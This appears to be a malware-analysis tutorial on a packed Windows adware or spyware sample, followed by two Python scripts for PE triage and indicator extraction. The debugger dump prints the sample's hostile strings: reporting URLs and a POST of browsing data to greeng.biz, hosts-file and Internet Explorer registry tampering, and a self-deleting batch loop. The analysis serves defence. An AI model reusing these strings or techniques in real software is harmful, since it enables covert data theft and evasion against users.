OK, when dealing with malware one doesn't start out debugging it. One at least has a cursory static glance before proceeding to load it in a debugger, else some clever little tricks may simply trick you into falling for the baits.
Those who prefer to use their favourite hex editor or LordPE or whatever are free to use them.
Unzip the attachment (use a virtual machine to follow; don't use your production machine to follow unless you are absolutely sure you can deal with the consequences successfully).
What do you notice? If you are already familiar with PE header formats, it doesn't look like a normal PE header, so you can be sure that this is not a normal binary; it could be packed, crypted, obfuscated, whatever.
So there is no point loading it directly in a debugger; let's poke around a little bit more.
Let's find the entry point and see if we can decipher some more things before taking the plunge.
OK, we see the section headers: we see its virtual address is 24000, pointer to raw size is 200, and address of entry point is 27462.
We pore over the disassembly and all we see are a few calls and short jumps within viewable distances; only one jump in there sticks out like a sore thumb.
From the jump, can you really identify the OEP? Just with basic information and the opcodes?
You haven't yet loaded it in a debugger or a real disassembler, which would make your life a little easier, but you can still be about 99.9% sure about the OEP you would decipher at this stage.
Some of the imports it resolves and some strings generated after unpacking are like this. What do you find if you hunt down information on the URLs?
Code:
77D40000 Module C:\WINDOWS\system32\user32.dll
0042750B COND: ReleaseDC
0042750B COND: GlobalFree
0042750B COND: GlobalLock
0042750B COND: GlobalUnlock
0042750B COND: LocalAlloc
0042750B COND: LocalFree
0042750B COND: MultiByteToWideChar
0042750B COND: ReadFile
0042750B COND: SetEndOfFile
0042750B COND: SetFilePointer
0042750B COND: Sleep
0042750B COND: WideCharToMultiByte
0042750B COND: WinExec
0042750B COND: WriteFile
0042750B COND: lstrcatA
0042750B COND: lstrcmpA
0042750B COND: lstrcmpiA
0042750B COND: lstrcpyA
0042750B COND: lstrcpynA
0042750B COND: lstrlenA
0042750B COND: GlobalAlloc
0042750B COND: GetVersionExA
0042750B COND: GetTickCount
0042750B COND: GetTempPathA
0042750B COND: GetSystemDirectoryA
0042750B COND: GetModuleFileNameA
0042750B COND: GetCurrentProcess
0042750B COND: CloseHandle
0042750B COND: HeapFree
0042750B COND: HeapAlloc
0042750B COND: GetProcessHeap
0042750B COND: GetFileSize
0042750B COND: CopyFileA
0042750B COND: CreateFileA
0042750B COND: DeleteFileA
0042750B COND: ExitProcess
77F10000 Module C:\WINDOWS\system32\GDI32.dll
77DD0000 Module C:\WINDOWS\system32\advapi32.dll
0042750B COND: OpenProcessToken
0042750B COND: LookupPrivilegeValueA
0042750B COND: RegCloseKey
0042750B COND: RegOpenKeyExA
0042750B COND: RegSetValueExA
0042750B COND: AdjustTokenPrivileges
77E70000 Module C:\WINDOWS\system32\RPCRT4.dll
771B0000 Module C:\WINDOWS\system32\wininet.dll
77C10000 Module C:\WINDOWS\system32\msvcrt.dll
77F60000 Module C:\WINDOWS\system32\SHLWAPI.dll
77A80000 Module C:\WINDOWS\system32\CRYPT32.dll
77B20000 Module C:\WINDOWS\system32\MSASN1.dll
77120000 Module C:\WINDOWS\system32\OLEAUT32.dll
774E0000 Module C:\WINDOWS\system32\ole32.dll
773D0000 Module C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0042750B COND: InternetCloseHandle
0042750B COND: HttpSendRequestA
0042750B COND: HttpOpenRequestA
0042750B COND: FindNextUrlCacheEntryA
0042750B COND: FindFirstUrlCacheEntryA
0042750B COND: DeleteUrlCacheEntryA
0042750B COND: InternetConnectA
77260000 Module C:\WINDOWS\system32\urlmon.dll
0042750B COND: URLDownloadToFileA
77C00000 Module C:\WINDOWS\system32\VERSION.dll
7C9C0000 Module C:\WINDOWS\system32\shell32.dll
0042750B COND: ShellExecuteA
0042750B COND: GetTextExtentPoint32A
0042750B COND: GetObjectA
0042750B COND: DeleteObject
0042750B COND: PatBlt
0042750B COND: CreateFontA
0042750B COND: CreateCompatibleDC
0042750B COND: CreateCompatibleBitmap
0042750B COND: SelectObject
0042750B COND: StretchBlt
0042750B COND: TextOutA
0042750B COND: CreateDIBitmap
0042750B COND: CreateDIBSection
0042750B COND: DeleteDC
0042750B COND: OleInitialize
0042750B COND: OleUninitialize
0042750B COND: CoCreateInstance
0042750B COND: VariantInit
0042750B COND: SysFreeString
0042750B COND: SysAllocString
Text strings referenced in 47547792:
Address Disassembly Text string
00401000 PUSH EBP (Initial CPU selection)
0040121F PUSH 47547792.00408C3D ASCII "complete"
0040125F PUSH 47547792.00408C48 ASCII "interactive"
0040127C PUSH 47547792.00408C54 ASCII "HL_"
00401281 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040128D PUSH 47547792.00408C58 ASCII "HD_"
00401292 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012A9 PUSH 47547792.00408C5C ASCII "DO_"
004012AE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012BA PUSH 47547792.00408C60 ASCII "IW_"
004012BF PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004013FC PUSH 47547792.00408C64 ASCII "7search.com/scripts/security/validate.asp"
00401479 PUSH 47547792.00408C94 ASCII "http://66.199.179.8/search.php"
0040148D PUSH 47547792.00408CB4 ASCII "http://65.39.170.123/search.php"
004014B8 PUSH 47547792.00408CD4 ASCII "http://66.250.74.152/click_second"
00401781 PUSH 47547792.00408CFC ASCII "NC2_"
00401786 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017A6 PUSH 47547792.00408D04 ASCII "NW_"
004017AB PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017CE PUSH 47547792.0040853E ASCII "winlogon.exe"
004017F0 PUSH 47547792.0040853E ASCII "winlogon.exe"
0040184C PUSH 47547792.0040854B ASCII "%d.%d-"
00401863 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401878 PUSH 47547792.004084EB ASCII "no"
0040187D PUSH 47547792.004084E2 ASCII "PopupMgr"
00401882 PUSH 47547792.00408487 ASCII "Software\Microsoft\Internet Explorer\New Windows"
00401891 PUSH 47547792.004084EB ASCII "no"
00401896 PUSH 47547792.004084F2 ASCII "Display Inline Images"
0040189B PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018AA PUSH 47547792.004084EB ASCII "no"
004018AF PUSH 47547792.00408508 ASCII "Display Inline Videos"
004018B4 PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018DE PUSH 47547792.00408AF1 ASCII "Regsvr32.exe /s shdocvw.dll"
004019B1 PUSH 47547792.00408D08 ASCII "&er["
004019B6 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019C5 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019CF PUSH 47547792.00408D10 ASCII "]="
004019D4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A19 PUSH 47547792.00408D14 ASCII "SW_"
00401A1E PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A4C PUSH 47547792.00408D18 ASCII "RB_"
00401A51 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A6A PUSH 47547792.00408552 ASCII "ghdfggf6j.tmp"
00401A82 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401D9C PUSH 47547792.00408D1C ASCII "DC_"
00401DA1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E06 PUSH 47547792.00408D20 ASCII "NL_"
00401E0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E28 PUSH 47547792.00408D24 ASCII "EC_"
00401E2D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E40 PUSH 47547792.00408D28 ASCII "NC_"
00401E45 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E65 PUSH 47547792.00408D2C ASCII "OW_"
00401E6A PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401EC7 PUSH 47547792.00408D30 ASCII "testovaya hren"
0040200B PUSH 47547792.004085B8 ASCII "Suurch
findnseek
shopzil
www.suurch.com
"
00402078 PUSH 47547792.00408566 ASCII "add to card
checkout
continue shopping
download
submit
click here
cart
"
00402223 PUSH 47547792.00408D40 ASCII "Im_"
00402228 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402284 PUSH 47547792.00408D44 ASCII "Lim_"
00402289 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022BC PUSH 47547792.00408D4C ASCII "Tc_"
004022C1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022D0 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023C9 PUSH 47547792.00408D50 ASCII "Mc_"
004023CE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023F5 PUSH 47547792.00408D54 ASCII "Lp_"
004023FA PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402634 PUSH 47547792.00408D5C ASCII "value=no_spyware"
004026EA PUSH 47547792.00408D70 ASCII "f1"
0040271B PUSH 47547792.00408D74 ASCII "f3"
00402752 PUSH 47547792.00408D78 ASCII "None"
00402765 PUSH 47547792.00408D80 ASCII "none"
0040283E PUSH 47547792.00408D88 ASCII "FC_"
00402843 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004029F7 PUSH 47547792.00408D8C ASCII "Im_"
004029FC PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402A44 PUSH 47547792.00408D90 ASCII "66.250.74.152/kw_img/img_gen.php"
00402BB4 PUSH 47547792.00408DB4 ASCII "Im_"
00402BB9 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C6D PUSH 47547792.00408DBC ASCII "Tc_"
00402C72 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C81 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402D78 PUSH 47547792.00408DC0 ASCII "Mc_"
00402D7D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402F06 PUSH 47547792.00408DC4 ASCII "fc"
00402F0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040304D PUSH 47547792.00408DC8 ASCII "ac"
00403052 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403176 PUSH 47547792.00408DCC ASCII "rc"
0040317B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403414 PUSH 47547792.00408DD0 ASCII "BODY_"
00403419 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403568 PUSH 47547792.00408443 ASCII "grdsfsd.bat"
00403598 PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035AB PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035C8 ASCII ""%s"",0
004035D2 PUSH 47547792.004035C8 ASCII ""%s""
004035F3 PUSH 47547792.00408482 ASCII "open"
00403759 PUSH 47547792.004085E7 ASCII "\drivers\etc\hosts"
004038DF PUSH 47547792.00408DD8 ASCII "text="
004038F7 PUSH 47547792.00408DE0 ASCII "&url="
00403911 ASCII "Content-Type: ap"
00403921 ASCII "plication/x-www-"
00403931 ASCII "form-urlencoded",0
0040394A PUSH 47547792.00408DE8 ASCII "MyAgent"
0040396B PUSH 47547792.00408428 ASCII "greeng.biz"
00403989 PUSH 47547792.00408437 ASCII "ht/post.php"
0040398E PUSH 47547792.00408DF0 ASCII "POST"
004039B0 PUSH 47547792.00403911 ASCII "Content-Type: application/x-www-form-urlencoded"
00403A4D PUSH 47547792.00408DF8 ASCII "Shell DocObject View"
00403A61 PUSH 47547792.00408E0D ASCII "Internet Explorer_Server"
00403CA5 MOV EDI, 47547792.0040863A ASCII "Arial"
00403D89 PUSH 47547792.00408E26 ASCII "%ld_%ld_%ld"
00403DA4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004042E2 PUSH 47547792.00408E34 ASCII "%lX.png"
00404473 PUSH 47547792.00408E3C ASCII "RZ_"
00404478 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004044CE PUSH 47547792.00408E40 ASCII "Arial"
004045BD PUSH 47547792.00408E48 ASCII "%lX.png"
004048EC PUSH 47547792.00408560 ASCII "-%lX-"
00404907 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00404931 PUSH 47547792.00408ADD ASCII "SeShutdownPrivilege"
00408000 ASCII "http://greeng.bi"
00408010 ASCII "z:2080/rd/rep.ph"
00408020 ASCII "p?er[0]=",0
00408428 ASCII "greeng.biz",0
00408437 ASCII "ht/post.php",0
00408443 ASCII "grdsfsd.bat",0
0040844F ASCII ":gl234sh
del %1"
0040845F ASCII "
if exist %1 go"
0040846F ASCII "to gl234sh
del "
0040847F ASCII "%0",0
00408482 ASCII "open",0
00408487 ASCII "Software\Microso"
00408497 ASCII "ft\Internet Expl"
004084A7 ASCII "orer\New Windows"
004084B7 ASCII 0
004084B8 ASCII "Software\Microso"
004084C8 ASCII "ft\Internet Expl"
004084D8 ASCII "orer\Main",0
004084E2 ASCII "PopupMgr",0
004084EB ASCII "no",0
004084EE ASCII "yes",0
004084F2 ASCII "Display Inline I"
00408502 ASCII "mages",0
00408508 ASCII "Display Inline V"
00408518 ASCII "ideos",0
0040853E ASCII "winlogon.exe",0
0040854B ASCII "%d.%d-",0
00408552 ASCII "ghdfggf6j.tmp",0
00408560 ASCII "-%lX-",0
00408566 ASCII "add to card
che"
00408576 ASCII "ckout
continue "
00408586 ASCII "shopping
downlo"
00408596 ASCII "ad
submit
clic"
004085A6 ASCII "k here
cart
",0
004085B8 ASCII "Suurch
findnsee"
004085C8 ASCII "k
shopzil
www."
004085D8 ASCII "suurch.com
",0
004085E7 ASCII "\drivers\etc\hos"
004085F7 ASCII "ts",0
004085FA ASCII "ABCDEFGHIJKLMNOP"
0040860A ASCII "QRSTUVWXYZabcdef"
0040861A ASCII "ghijklmnopqrstuv"
0040862A ASCII "wxyz0123456789+_"
0040863A ASCII "Arial",0
00408640 ASCII "Century Gothic",0
0040864F ASCII "Haettenschweiler"
0040865F ASCII 0
00408660 ASCII "Times New Roman",0
00408670 ASCII "MS Sans Serif",0
0040867E ASCII "AvantGarde Bk BT"
0040868E ASCII 0
0040868F ASCII "Comic Sans MS",0
0040869D ASCII "Courier New",0
00408ADD ASCII "SeShutdownPrivil"
00408AED ASCII "ege",0
00408AF1 ASCII "Regsvr32.exe /s "
00408B01 ASCII "shdocvw.dll",0
00408C3D ASCII "complete",0
00408C48 ASCII "interactive",0
00408C54 ASCII "HL_",0
00408C58 ASCII "HD_",0
00408C5C ASCII "DO_",0
00408C60 ASCII "IW_",0
00408C83 ASCII "lidate.asp",0
00408C94 ASCII "http://66.199.17"
00408CA4 ASCII "9.8/search.php",0
00408CB4 ASCII "http://65.39.170"
00408CC4 ASCII ".123/search.php",0
00408CD4 ASCII "http://66.250.74"
00408CE4 ASCII ".152/click_secon"
00408CF4 ASCII "d",0
00408CFC ASCII "NC2_",0
00408D04 ASCII "NW_",0
00408D08 ASCII "&er[",0
00408D10 ASCII "]=",0
00408D14 ASCII "SW_",0
00408D18 ASCII "RB_",0
00408D1C ASCII "DC_",0
00408D20 ASCII "NL_",0
00408D24 ASCII "EC_",0
00408D28 ASCII "NC_",0
00408D2C ASCII "OW_",0
00408D30 ASCII "testovaya hren",0
00408D40 ASCII "Im_",0
00408D44 ASCII "Lim_",0
00408D4C ASCII "Tc_",0
00408D50 ASCII "Mc_",0
00408D54 ASCII "Lp_",0
00408D5C ASCII "value=no_spyware"
00408D6C ASCII 0
00408D70 ASCII "f1",0
00408D74 ASCII "f3",0
00408D78 ASCII "None",0
00408D80 ASCII "none",0
00408D88 ASCII "FC_",0
00408D8C ASCII "Im_",0
00408D90 ASCII "66.250.74.152/kw"
00408DA0 ASCII "_img/img_gen.php"
00408DB0 ASCII 0
00408DB4 ASCII "Im_",0
00408DBC ASCII "Tc_",0
00408DC0 ASCII "Mc_",0
00408DC4 ASCII "fc",0
00408DC8 ASCII "ac",0
00408DCC ASCII "rc",0
00408DD0 ASCII "BODY_",0
00408DD8 ASCII "text=",0
00408DE0 ASCII "&url=",0
00408DE8 ASCII "MyAgent",0
00408DF0 ASCII "POST",0
00408DF8 ASCII "Shell DocObject "
00408E08 ASCII "View",0
00408E0D ASCII "Internet Explore"
00408E1D ASCII "r_Server",0
00408E26 ASCII "%ld_%ld_%ld",0
00408E34 ASCII "%lX.png",0
00408E3C ASCII "RZ_",0
00408E40 ASCII "Arial",0
00408E48 ASCII "%lX.png",0
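The "cursory static glance" the post walks through (section headers, which section owns the entry point, the one jump that leaves the stub) can be scripted. The block below is an added example, not code from the post or its author: a minimal PE32 header walker that parses the section table, flags the usual packer tells (entry point in the last section, writable+executable sections, sections with a virtual size but no raw bytes), and scans the entry-point section's file-backed bytes for E9 rel32 jumps whose target lands in another executable section, which is the OEP candidate. The sample PE is constructed inline; its section names, RVAs and stub bytes are invented for the demo and are not the attachment's.

```python
"""Added example (not from the original post): static PE32 triage before debugging.
Standard PE32 header offsets; the sample PE below is constructed for the demo."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe32(data: bytes) -> dict:
    """Return entry RVA, image base and the section table of a PE32 file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                  # COFF header is 20 bytes
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry = struct.unpack_from("<I", data, opt + 16)[0]       # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]  # ImageBase
    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode("latin-1"),
                         "vsize": f[1], "va": f[2], "rawsize": f[3],
                         "rawptr": f[4], "chars": f[9]})
    return {"entry": entry, "image_base": image_base, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def triage(pe: dict, data: bytes) -> dict:
    """Packer tells from the headers plus OEP candidates from far jumps in the EP section."""
    findings = []
    for s in pe["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{s['name']}: writable and executable")
        if s["vsize"] and s["rawsize"] == 0:
            findings.append(f"{s['name']}: virtual size 0x{s['vsize']:x} but no raw data (unpack target?)")
    home = section_for_rva(pe, pe["entry"])
    if home is None:
        findings.append(f"entry point 0x{pe['entry']:x} lies outside every section")
        return {"ep_section": None, "oep_candidates": [], "findings": findings}
    if home is pe["sections"][-1]:
        findings.append(f"entry point is in the last section ({home['name']})")
    # Heuristic scan: E9 rel32 whose target leaves the EP section for executable memory.
    # An E9 byte inside other instructions gives false hits, so these are candidates only.
    candidates = []
    start, end = home["rawptr"], home["rawptr"] + home["rawsize"]
    for off in range(start, end - 4):
        if data[off] != 0xE9:
            continue
        rel = struct.unpack_from("<i", data, off + 1)[0]
        src_rva = home["va"] + (off - start)
        target = src_rva + 5 + rel
        dest = section_for_rva(pe, target)
        if dest is not None and dest is not home and dest["chars"] & IMAGE_SCN_MEM_EXECUTE:
            candidates.append({"jmp_rva": src_rva, "target_rva": target, "section": dest["name"]})
    return {"ep_section": home["name"], "oep_candidates": candidates, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed PE32 with a packed-style layout: empty .text, stub in the last section."""
    entry, oep = 0x12030, 0x1234
    sections = [  # name, vsize, va, rawsize, rawptr, characteristics
        (b".text", 0x10000, 0x1000, 0, 0, 0x60000020),
        (b".rsrc", 0x1000, 0x11000, 0x200, 0x400, 0x40000040),
        (b"stub", 0x2000, 0x12000, 0x200, 0x600, 0xE0000060),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0, 0, 0, entry, 0x1000, 0x11000, 0x400000)
    opt += b"\0" * (0xE0 - len(opt))
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in sections)
    img = bytearray(dos + coff + opt + table)
    img += b"\0" * (0x800 - len(img))
    # Stub at the EP: pushad; popad; jmp rel32 -> OEP inside .text
    jmp_rva = entry + 2
    stub = b"\x60\x61\xE9" + struct.pack("<i", oep - (jmp_rva + 5))
    stub_off = 0x600 + (entry - 0x12000)
    img[stub_off:stub_off + len(stub)] = stub
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample_pe()
    result = triage(parse_pe32(sample), sample)
    for line in result["findings"]:
        print(line)
    print(result["oep_candidates"])
```

Run against a real sample, `triage()` tells you where the entry point lives relative to the file-backed bytes and gives you the far-jump targets to check by hand; it deliberately does not try to name the packer.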
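To "hunt down information on the URLs" it helps to pull the indicators out of the OllyDbg listing mechanically rather than by eye. The block below is an added example, not code from the post or its author: a parser for the "Text strings referenced" format shown above that handles the multi-line strings (the batch file, the word lists), re-joins the 16-byte data-window fragments at consecutive addresses, and sorts the results into IOC buckets (URLs, hosts, IPs, registry keys, file names, privileges). The sample input is a subset of lines copied from the listing; the bucket rules are my own and are assumptions, not anything the post states.

```python
"""Added example (not from the original post): IOC extraction from an OllyDbg
text-strings dump. SAMPLE_DUMP is a subset of lines from the listing above."""
import re

LINE_RE = re.compile(r'^([0-9A-F]{8})\s+(.*?)ASCII\s+(.*)$')
IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
URL_RE = re.compile(r'^(?:https?://)?[\w-]+(?:\.[\w-]+)+(?::\d+)?/')
FILE_RE = re.compile(r'\.(?:exe|dll|bat|tmp|sys|scr)$|(?:^|\\)hosts$', re.I)
PRIV_RE = re.compile(r'^Se\w+Privilege$')
HOST_RE = re.compile(r'^(?:[\w-]+\.)+[A-Za-z]{2,}$')


def _closed(body: str) -> bool:
    return body.endswith('",0') or body.endswith('"')


def parse_olly_strings(dump: str) -> list:
    """Return the unique strings from an OllyDbg 'Text strings referenced' dump."""
    records = []   # (addr, text, null_terminated, is_data_line)
    lines = dump.splitlines()
    i = 0
    while i < len(lines):
        m = LINE_RE.match(lines[i])
        i += 1
        if not m:
            continue
        addr, prefix, rest = int(m.group(1), 16), m.group(2).strip(), m.group(3)
        if not rest.startswith('"'):
            continue              # `ASCII 0`: a lone terminator byte, no text
        body = rest[1:]
        # Multi-line strings (batch files, word lists) run on until a closing quote.
        while not _closed(body) and i < len(lines):
            body += "\n" + lines[i]
            i += 1
        terminated = body.endswith(',0')
        if terminated:
            body = body[:-2]
        if body.endswith('"'):
            body = body[:-1]
        records.append((addr, body, terminated, prefix == ""))
    # Data-window rows show 16 bytes each; an unterminated row followed by a row at
    # addr+16 is the same string continued. (A CRLF inside a string prints as one
    # line break, so the address arithmetic does not hold for those rows.)
    merged = []
    for addr, text, terminated, is_data in records:
        if merged and is_data and merged[-1][3] and not merged[-1][2] \
                and merged[-1][0] + len(merged[-1][1]) == addr:
            paddr, ptext, _, _ = merged.pop()
            merged.append((paddr, ptext + text, terminated, True))
        else:
            merged.append((addr, text, terminated, is_data))
    return sorted({text for _, text, _, _ in merged})


def classify(strings) -> dict:
    """Sort extracted strings into IOC buckets; the first matching rule wins."""
    buckets = {k: set() for k in
               ("urls", "hosts", "ips", "registry_keys", "files", "privileges", "other")}
    for s in strings:
        buckets["ips"].update(IP_RE.findall(s))      # IPs also count wherever they appear
        if URL_RE.match(s):
            buckets["urls"].add(s)
        elif s.startswith("Software\\") or s.startswith("HKEY_"):
            buckets["registry_keys"].add(s)
        elif FILE_RE.search(s):
            buckets["files"].add(s)
        elif PRIV_RE.match(s):
            buckets["privileges"].add(s)
        elif HOST_RE.match(s):
            buckets["hosts"].add(s)
        else:
            buckets["other"].add(s)
    return {k: sorted(v) for k, v in buckets.items()}


# Subset of lines copied from the listing in the post.
SAMPLE_DUMP = r"""
00401281 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004013FC PUSH 47547792.00408C64 ASCII "7search.com/scripts/security/validate.asp"
00401479 PUSH 47547792.00408C94 ASCII "http://66.199.179.8/search.php"
004017CE PUSH 47547792.0040853E ASCII "winlogon.exe"
00401882 PUSH 47547792.00408487 ASCII "Software\Microsoft\Internet Explorer\New Windows"
00401A6A PUSH 47547792.00408552 ASCII "ghdfggf6j.tmp"
00403568 PUSH 47547792.00408443 ASCII "grdsfsd.bat"
00403598 PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035C8 ASCII ""%s"",0
00403759 PUSH 47547792.004085E7 ASCII "\drivers\etc\hosts"
0040396B PUSH 47547792.00408428 ASCII "greeng.biz"
00404931 PUSH 47547792.00408ADD ASCII "SeShutdownPrivilege"
00408000 ASCII "http://greeng.bi"
00408010 ASCII "z:2080/rd/rep.ph"
00408020 ASCII "p?er[0]=",0
004084B7 ASCII 0
"""

if __name__ == "__main__":
    for bucket, items in classify(parse_olly_strings(SAMPLE_DUMP)).items():
        print(bucket, items)
```

The three fragment rows at 00408000, 00408010 and 00408020 come back as the same reporting URL the PUSH at 00401281 references, so the de-duplicated list is what you would take to a WHOIS or passive-DNS lookup.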